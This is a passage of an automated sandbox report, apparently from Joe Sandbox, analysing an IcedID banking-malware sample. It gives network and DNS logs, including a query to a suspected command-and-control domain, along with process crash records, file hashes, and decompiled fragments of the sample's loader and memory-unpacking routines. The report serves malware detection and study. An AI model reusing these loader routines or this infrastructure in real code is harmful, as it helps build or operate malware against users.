Jan 14, 2021 04:02:44.637275934 CET	53	50141	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:45.816457987 CET	53023	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:45.874295950 CET	53	53023	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:46.975577116 CET	49563	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:47.034167051 CET	53	49563	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:48.168927908 CET	51352	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:48.216887951 CET	53	51352	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:49.390399933 CET	59349	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:49.438287020 CET	53	59349	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:50.543476105 CET	57084	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:50.591331959 CET	53	57084	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:51.763727903 CET	58823	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:51.811760902 CET	53	58823	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:53.013219118 CET	57568	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:53.061137915 CET	53	57568	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:55.540607929 CET	50540	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:55.599895954 CET	53	50540	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:56.658823967 CET	54366	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:56.715101957 CET	53	54366	8.8.8.8	192.168.2.3
Jan 14, 2021 04:02:57.587508917 CET	53034	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:02:57.635356903 CET	53	53034	8.8.8.8	192.168.2.3
Jan 14, 2021 04:03:13.865518093 CET	57762	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:03:14.008744955 CET	53	57762	8.8.8.8	192.168.2.3
Jan 14, 2021 04:03:28.355820894 CET	55435	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:03:28.413849115 CET	53	55435	8.8.8.8	192.168.2.3
Jan 14, 2021 04:03:28.958537102 CET	50713	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:03:29.009180069 CET	53	50713	8.8.8.8	192.168.2.3
Jan 14, 2021 04:03:30.788479090 CET	56132	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:03:30.849518061 CET	53	56132	8.8.8.8	192.168.2.3
Jan 14, 2021 04:03:40.658459902 CET	58987	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:03:40.716289997 CET	53	58987	8.8.8.8	192.168.2.3
Jan 14, 2021 04:03:50.941011906 CET	56579	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:03:51.012018919 CET	53	56579	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:06.841526031 CET	60633	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:06.899365902 CET	53	60633	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:07.443937063 CET	61292	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:07.492047071 CET	53	61292	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:07.621474028 CET	63619	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:07.670430899 CET	53	63619	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:11.022910118 CET	64938	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:11.087511063 CET	53	64938	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:15.723376989 CET	61946	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:15.792798996 CET	53	61946	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:17.913858891 CET	64910	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:17.962712049 CET	53	64910	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:28.063801050 CET	52123	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:28.114609957 CET	53	52123	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:39.059943914 CET	56130	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:39.119180918 CET	53	56130	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:39.410049915 CET	56338	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:39.468117952 CET	53	56338	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:44.425735950 CET	59420	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:44.473823071 CET	53	59420	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:49.251020908 CET	58784	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:49.298911095 CET	53	58784	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:52.946593046 CET	63978	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:53.006309986 CET	53	63978	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:58.881520987 CET	62938	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:58.943303108 CET	53	62938	8.8.8.8	192.168.2.3
Jan 14, 2021 04:04:59.224991083 CET	55708	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:04:59.645874023 CET	53	55708	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:00.050563097 CET	56803	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:00.277928114 CET	53	56803	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:05.585212946 CET	57145	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:05.944235086 CET	53	57145	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:11.815483093 CET	55359	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:11.878107071 CET	53	55359	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:17.850574970 CET	58306	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:17.915168047 CET	53	58306	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:20.444683075 CET	64124	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:20.492532015 CET	53	64124	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:20.922383070 CET	49361	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:20.990811110 CET	53	49361	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:24.093696117 CET	63150	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:24.167789936 CET	53	63150	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:31.951855898 CET	53279	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:32.100008011 CET	53	53279	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:32.717174053 CET	56881	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:32.827061892 CET	53	56881	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:34.039890051 CET	53642	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:34.096226931 CET	53	53642	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:34.543354034 CET	55667	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:34.602196932 CET	53	55667	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:35.091520071 CET	54833	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:35.147965908 CET	53	54833	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:35.698450089 CET	62476	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:35.754991055 CET	53	62476	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:36.282718897 CET	49705	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:36.339052916 CET	53	49705	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:36.981055975 CET	61477	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:37.040271997 CET	53	61477	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:37.704214096 CET	61633	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:37.760768890 CET	53	61633	8.8.8.8	192.168.2.3
Jan 14, 2021 04:05:38.128257990 CET	55949	53	192.168.2.3	8.8.8.8
Jan 14, 2021 04:05:38.188183069 CET	53	55949	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 14, 2021 04:04:11.022910118 CET	192.168.2.3	8.8.8.8	0x3dd2	Standard query (0)	g.msn.com	A (IP address)	IN (0x0001)
Jan 14, 2021 04:04:39.410049915 CET	192.168.2.3	8.8.8.8	0xc9d	Standard query (0)	support.oracle.com	A (IP address)	IN (0x0001)
Jan 14, 2021 04:04:52.946593046 CET	192.168.2.3	8.8.8.8	0xb677	Standard query (0)	www.oracle.com	A (IP address)	IN (0x0001)
Jan 14, 2021 04:04:58.881520987 CET	192.168.2.3	8.8.8.8	0x617f	Standard query (0)	www.intel.com	A (IP address)	IN (0x0001)
Jan 14, 2021 04:04:59.224991083 CET	192.168.2.3	8.8.8.8	0xa65d	Standard query (0)	www.intel.ch	A (IP address)	IN (0x0001)
Jan 14, 2021 04:05:00.050563097 CET	192.168.2.3	8.8.8.8	0x23d9	Standard query (0)	corpredirect.intel.com	A (IP address)	IN (0x0001)
Jan 14, 2021 04:05:05.585212946 CET	192.168.2.3	8.8.8.8	0x264b	Standard query (0)	gegemony4you.top	A (IP address)	IN (0x0001)
Jan 14, 2021 04:05:17.850574970 CET	192.168.2.3	8.8.8.8	0x9598	Standard query (0)	help.twitter.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 14, 2021 04:03:28.413849115 CET	8.8.8.8	192.168.2.3	0x99f8	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:04:06.899365902 CET	8.8.8.8	192.168.2.3	0x4b41	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:04:11.087511063 CET	8.8.8.8	192.168.2.3	0x3dd2	No error (0)	g.msn.com	g-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:04:39.468117952 CET	8.8.8.8	192.168.2.3	0xc9d	No error (0)	support.oracle.com	support.oracle.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:04:53.006309986 CET	8.8.8.8	192.168.2.3	0xb677	No error (0)	www.oracle.com	ds-www.oracle.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:04:58.943303108 CET	8.8.8.8	192.168.2.3	0x617f	No error (0)	www.intel.com	intel11.cn.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:04:59.645874023 CET	8.8.8.8	192.168.2.3	0xa65d	No error (0)	www.intel.ch	intel19233.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:05:00.277928114 CET	8.8.8.8	192.168.2.3	0x23d9	No error (0)	corpredirect.intel.com	intel11.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:05:05.944235086 CET	8.8.8.8	192.168.2.3	0x264b	Name error (3)	gegemony4you.top	none	none	A (IP address)	IN (0x0001)
Jan 14, 2021 04:05:17.915168047 CET	8.8.8.8	192.168.2.3	0x9598	No error (0)	help.twitter.com	s.twitter.com		CNAME (Canonical name)	IN (0x0001)
Jan 14, 2021 04:05:17.915168047 CET	8.8.8.8	192.168.2.3	0x9598	No error (0)	s.twitter.com		104.244.42.131	A (IP address)	IN (0x0001)
Jan 14, 2021 04:05:17.915168047 CET	8.8.8.8	192.168.2.3	0x9598	No error (0)	s.twitter.com		104.244.42.3	A (IP address)	IN (0x0001)
Jan 14, 2021 04:05:17.915168047 CET	8.8.8.8	192.168.2.3	0x9598	No error (0)	s.twitter.com		104.244.42.195	A (IP address)	IN (0x0001)
Jan 14, 2021 04:05:17.915168047 CET	8.8.8.8	192.168.2.3	0x9598	No error (0)	s.twitter.com		104.244.42.67	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 14, 2021 04:05:18.012618065 CET	104.244.42.131	443	192.168.2.3	49761	CN=*.twitter.com, OU=fra2, O="Twitter, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Mar 05 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Tue Mar 02 13:00:00 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Jan 14, 2021 04:05:18.012618065 CET	104.244.42.131	443	192.168.2.3	49761	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		ce5f3254611a8c095a3d821d44539877

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: sample4.exe PID: 2100 Parent PID: 5880

General

Start time:	04:02:46
Start date:	14/01/2021
Path:	C:\Users\user\Desktop\sample4.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\sample4.exe'
Imagebase:	0xd0000
File size:	2136576 bytes
MD5 hash:	5009B8BCF024704C8B23E42C492F118C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 1488 Parent PID: 2100

General

Start time:	04:04:00
Start date:	14/01/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768
Imagebase:	0x9e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5920 Parent PID: 2100

General

Start time:	04:04:08
Start date:	14/01/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 804
Imagebase:	0x9e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 620 Parent PID: 2100

General

Start time:	04:04:19
Start date:	14/01/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 896
Imagebase:	0x9e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5008 Parent PID: 2100

General

Start time:	04:04:29
Start date:	14/01/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 924
Imagebase:	0x9e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5764 Parent PID: 2100

General

Start time:	04:04:40
Start date:	14/01/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1224
Imagebase:	0x9e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: sample4.exe PID: 2100 Parent PID: 5880 sample4.exeCOMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	16.9%
Signature Coverage:	8.4%
Total number of Nodes:	714
Total number of Limit Nodes:	48

Executed Functions

Function 00116FA9, Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32(LoveIn,0028EA38,0000076D), ref: 00116FEA
GetSystemInfo.KERNELBASE(002A3D54,0028EA38,00000000), ref: 00117080
FindFirstChangeNotificationW.KERNELBASE(?,00000001,00000100,?,00000000,000000FF), ref: 001171F7
GetEnvironmentVariableW.KERNEL32(equalSu,C:\Users\user\Desktop\sample4.exe,0000076D,C:\Users\user\Desktop\sample4.exe,00000000), ref: 00117425

Strings

8(, xrefs: 00116FD9
equalSu, xrefs: 00117412
LoveIn, xrefs: 00116FE5
C:\Users\user\Desktop\sample4.exe, xrefs: 00117289, 0011729B, 001172A7, 0011740D
-, xrefs: 00117371, 0011752B

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: EnvironmentVariable$ChangeFindFirstInfoNotificationSystem
String ID: 8($C:\Users\user\Desktop\sample4.exe$LoveIn$equalSu$ -
API String ID: 2077342498-624044919
Opcode ID: f438a0f184ee00006af4404f74f52b8b18740be9ab763c4e03befd7cc97048d3
Instruction ID: 7399eafdf43650a4122f99fbf48aef97994ab66dd287d1f6e9a6ca12053ab666
Opcode Fuzzy Hash: f438a0f184ee00006af4404f74f52b8b18740be9ab763c4e03befd7cc97048d3
Instruction Fuzzy Hash: AF02E67950F2918BD71DEB35B8AD0F57FF0EA66B11B08046EF8D1873E2D2288689D711

Uniqueness

Uniqueness Score: -1.00%

Function 000D121E, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000D121E(char* __ecx, intOrPtr* __edx) {
				void* _v256;
				long _v260;
				char _v264;
				long _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _v284;
				char* _t17;
				char* _t32;
				intOrPtr* _t41;
				void* _t43;

				_t41 = __edx;
				_t32 = __ecx;
				_t17 = StrStrIA(GetCommandLineA(), "-id="); // executed
				if(_t17 == 0) {
					L6:
					return 0;
				}
				 *0xd3000 = StrToIntA( &(_t17[4]));
				wsprintfA( &(( &_v264)[GetTempPathA(0x104,  &_v264)]), "~%u.tmp",  *0xd3000);
				if(E000D143A( &_v284,  &_v280) == 0) {
					goto L6;
				}
				_v272 = 4;
				_v268 = 0;
				_v276 = 0xd3000;
				_v264 = 0;
				_v260 = 0;
				_t43 = E000D24CF( &_v284);
				if(_v284 != 0) {
					HeapFree(GetProcessHeap(), 0, _v284);
				}
				if(_t43 != 1) {
					goto L6;
				} else {
					 *_t32 = _v264;
					 *_t41 = _v260;
					return 1;
				}
			}

0x000d122b
0x000d122d
0x000d1236
0x000d123e
0x000d12ee
0x00000000
0x000d12ee
0x000d124e
0x000d1275
0x000d1292
0x00000000
0x00000000
0x000d1297
0x000d12a4
0x000d12a8
0x000d12b0
0x000d12b4
0x000d12bd
0x000d12c3
0x000d12d1
0x000d12d1
0x000d12de
0x00000000
0x000d12e0
0x000d12e4
0x000d12ea
0x00000000
0x000d12ea

APIs

GetCommandLineA.KERNEL32(-id=), ref: 000D122F
StrStrIA.KERNELBASE(00000000), ref: 000D1236
StrToIntA.SHLWAPI(-00000004), ref: 000D1248
GetTempPathA.KERNEL32(00000104,?), ref: 000D125D
wsprintfA.USER32 ref: 000D1275

Part of subcall function 000D143A: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,000D128D,?), ref: 000D1456

GetProcessHeap.KERNEL32(00000000,?), ref: 000D12CA
HeapFree.KERNEL32(00000000), ref: 000D12D1

Strings

~%u.tmp, xrefs: 000D126F
-id=, xrefs: 000D1226

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$CommandCreateFileFreeLinePathProcessTempwsprintf
String ID: -id=$~%u.tmp
API String ID: 3150461372-3856365564
Opcode ID: 70566aa0c0303591567e1ec83c880a4c34c1296e195b7483b82adba6d71d87be
Instruction ID: 543f7a099749763c17dc624aa95e56419ef77de10af8ebcee0cedf1a43c77e98
Opcode Fuzzy Hash: 70566aa0c0303591567e1ec83c880a4c34c1296e195b7483b82adba6d71d87be
Instruction Fuzzy Hash: 3A2145B25053059FD714AFA0D8489AA7FE8FB88355F00091EFA85D2251DB39D518CB75

Uniqueness

Uniqueness Score: -1.00%

Function 013004FD, Relevance: 13.8, APIs: 9, Instructions: 333
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,0000099E,00003000,00000040,0000099E,01300000), ref: 013005D1
VirtualAlloc.KERNELBASE(00000000,0000004E,00003000,00000040,01300039), ref: 01300608
VirtualAlloc.KERNELBASE(00000000,000036ED,00003000,00000040), ref: 01300668
VirtualFree.KERNELBASE(01320000,00000000,00008000), ref: 0130069E
VirtualProtect.KERNELBASE(000D0000,00006000,00000004,013004D4), ref: 013007B2
VirtualProtect.KERNEL32(000D0000,00001000,00000004,013004D4), ref: 013007D9

Part of subcall function 013003A6: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 013003DF

VirtualProtect.KERNELBASE(000D0000,?,00000002,013004D4), ref: 013008AD
VirtualProtect.KERNELBASE(000D0000,?,00000002,013004D4,?), ref: 01300903
VirtualFree.KERNELBASE(01320000,00000000,00008000), ref: 01300927

Memory Dump Source

Source File: 00000000.00000002.568355205.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1300000_sample4.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
Instruction ID: 7c71095f3363e4777b0baf7c71de7b1140012bb989f61651294e1d3054374041
Opcode Fuzzy Hash: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
Instruction Fuzzy Hash: C4D16DB2700B019FDF958F14C9D8B6177ABFF84764B0D4198ED099F6AAD770A840CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0028FB73, Relevance: 13.8, APIs: 9, Instructions: 320
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000099E,00003000,00000040,0000099E,0028F676), ref: 0028FC47
VirtualAlloc.KERNEL32(00000000,0000004E,00003000,00000040,0028F6AF), ref: 0028FC7E
VirtualAlloc.KERNEL32(00000000,000036ED,00003000,00000040), ref: 0028FCDE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0028FD14
VirtualProtect.KERNEL32(000D0000,00000000,00000004,0028FB4A), ref: 0028FE28
VirtualProtect.KERNEL32(000D0000,00001000,00000004,0028FB4A), ref: 0028FE4F
VirtualProtect.KERNEL32(00000000,?,00000002,0028FB4A), ref: 0028FF23
VirtualProtect.KERNEL32(00000000,?,00000002,0028FB4A,?), ref: 0028FF79
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0028FF9D

Memory Dump Source

Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28f000_sample4.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 1c23676164e1b2061ca9d054a87c66034e539bb7dd3c27851c800084a2ea1acf
Instruction ID: ba1e4b1fec3ec32699dc5e6545f6ef3e48f80346325368f9e0713f7d2f5d4503
Opcode Fuzzy Hash: 1c23676164e1b2061ca9d054a87c66034e539bb7dd3c27851c800084a2ea1acf
Instruction Fuzzy Hash: 4BD16EB6701B019FDF90DF14C9C8B5177AAFF84324B0D41A8ED099F6AAD770A850CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00147998, Relevance: 75.5, APIs: 42, Strings: 1, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 0014799F
GetSysColor.USER32(00000016), ref: 001479A8
GetSysColor.USER32(0000000F), ref: 001479BB
GetSysColor.USER32(00000015), ref: 001479D2
GetSysColor.USER32(0000000F), ref: 001479DE
GetSysColor.USER32(0000000F), ref: 00147A14
GetSysColor.USER32(00000010), ref: 00147A22
GetSysColor.USER32(00000015), ref: 00147A30
GetSysColor.USER32(00000016), ref: 00147A3E
GetSysColor.USER32(00000014), ref: 00147A4C
GetSysColor.USER32(00000012), ref: 00147A5A
GetSysColor.USER32(00000011), ref: 00147A68
GetSysColor.USER32(00000006), ref: 00147A73
GetSysColor.USER32(0000000D), ref: 00147A7E
GetSysColor.USER32(0000000E), ref: 00147A89
GetSysColor.USER32(00000005), ref: 00147A94
GetSysColor.USER32(00000008), ref: 00147AA2
GetSysColor.USER32(00000009), ref: 00147AAD
GetSysColor.USER32(00000007), ref: 00147AB8
GetSysColor.USER32(00000002), ref: 00147AC3
GetSysColor.USER32(00000003), ref: 00147ACE
GetSysColor.USER32(0000001B), ref: 00147ADC
GetSysColor.USER32(0000001C), ref: 00147AEA
GetSysColor.USER32(0000000A), ref: 00147AF8
GetSysColor.USER32(0000000B), ref: 00147B06
GetSysColor.USER32(00000013), ref: 00147B14
GetSysColor.USER32(0000001A), ref: 00147B35
GetSysColorBrush.USER32(00000010), ref: 00147B4E
GetSysColorBrush.USER32(00000014), ref: 00147B62
GetSysColorBrush.USER32(00000005), ref: 00147B71
CreateSolidBrush.GDI32(00000180), ref: 00147B8E
CreateSolidBrush.GDI32(00000010), ref: 00147BAC
CreateSolidBrush.GDI32(?), ref: 00147BCA
CreateSolidBrush.GDI32(?), ref: 00147BEB
CreateSolidBrush.GDI32(?), ref: 00147C09
CreateSolidBrush.GDI32(?), ref: 00147C27
CreateSolidBrush.GDI32(?), ref: 00147C45
CreatePen.GDI32(00000000,00000001,00000000), ref: 00147C69
CreatePen.GDI32(00000000,00000001,00000000), ref: 00147C8D
CreatePen.GDI32(00000000,00000001,00000000), ref: 00147CB1
CreateSolidBrush.GDI32(?), ref: 00147D39
CreatePatternBrush.GDI32(00000000), ref: 00147D7B

Strings

0, xrefs: 00147D63

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Color$BrushCreate$Solid$H_prolog3Pattern
String ID: 0
API String ID: 3391476863-1727780284
Opcode ID: c17d6e603f7a4256c9c9847da9cd6de3f780279f7dabad5201b9d2ff9c302cbf
Instruction ID: 3ff35f6dbddef6292d6c98bdb992082c9013336e00783f555f39a308d8b7d00e
Opcode Fuzzy Hash: c17d6e603f7a4256c9c9847da9cd6de3f780279f7dabad5201b9d2ff9c302cbf
Instruction Fuzzy Hash: 44C1BF70A04A56AFCB09AFB4AC0D7AEBBA0BF55700F404119E225D72D1DFB4E5A1CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0014745F, Relevance: 68.6, APIs: 34, Strings: 5, Instructions: 373
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00147469

Part of subcall function 0012738B: __EH_prolog3.LIBCMT ref: 00127392

DeleteObject.GDI32(00000000), ref: 001474F3
DeleteObject.GDI32(00000000), ref: 00147511
DeleteObject.GDI32(00000000), ref: 0014752F
DeleteObject.GDI32(00000000), ref: 0014754D
DeleteObject.GDI32(00000000), ref: 0014756B
DeleteObject.GDI32(00000000), ref: 00147589
DeleteObject.GDI32(00000000), ref: 001475A7
DeleteObject.GDI32(00000000), ref: 001475C5
DeleteObject.GDI32(00000000), ref: 001475E3
